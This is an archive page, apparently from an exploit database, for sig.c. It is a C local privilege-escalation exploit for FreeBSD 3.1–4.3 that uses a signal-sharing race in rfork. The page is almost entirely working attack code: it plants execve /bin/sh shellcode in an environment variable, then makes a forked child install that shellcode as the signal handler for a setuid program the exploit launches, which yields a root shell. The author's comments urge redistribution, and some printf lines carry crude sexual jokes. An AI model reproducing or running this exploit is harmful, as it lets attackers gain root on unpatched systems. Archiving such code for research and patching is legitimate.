what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

sig.c

sig.c
Posted Jul 18, 2001
Authored by Lamerboy

FreeBSD 3.1 - 4.3 local root exploit - Uses the signal condition vulnerability discovered by G. Guninski.

tags | exploit, local, root
systems | freebsd
SHA-256 | 877ecb999c4cc6e021713bc69df6e18a70c93bcd73f813c5488ecc59bcd1edb6

sig.c

Change Mirror Download
/*
* -//--//--//--//--//--//--//--//--//--//--//--//--//-
*
* fbsd 3.1-4.3 signal condition coded by lamerboy.
* found by G.Guninsky - thnx man, u so leeet! =)
* written after SA-01:42 released, for testing purpose
* ( and for phun cuz ).
*
* THIS CODE IS BEER-WARE LICENSED WITH ONE EXCEPTION:
* REDISTRIBUTION IN ANY FORM IS HIGHLY RECOMMENDED !
*
* -//--//--//--//--//--//--//--//--//--//--//--//--//-
*/

#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>
#include <signal.h>
#include <strings.h>

char shell[]=
"\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80\x00"; /* thnx preedator */

static struct sigaction sa;
static pid_t pid;
extern char **environ;

int
main (int argc, char **argv) {
char *file = NULL, *addr = NULL;
if (argc<2) {
printf("%s suid_prog\n", argv[0]);
exit(1);
}
file = strdup(argv[1]);
addr = getenv("CODE");
if (!addr) {
printf("hot hot chikz love icecream...\n");
printf("hot hot chikz love cool beer...\n");
printf("hot hot chikz love oral sex...\n");
printf("l33t l33t h4x0rz love have phun...\n");
printf("l33t l33t h4x0rz love G.Guninsky splotz...\n");
printf("thank you much man! you so l33t!\n\n");
setenv("CODE",shell,1);
execle(argv[0],file,file,0,environ);
}

printf("h0h0h0, addr = %p\n",addr);
memset(&sa,0,sizeof(struct sigaction));
sa.sa_handler = addr;
pid = rfork(RFPROC|RFFDG|RFSIGSHARE);
if (pid == 0) {
sleep(3);
sigaction(SIGUSR2,&sa,0);
kill(getppid(),SIGUSR2);
} else {
sleep(1);
execle(file,file,0,environ);
}
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close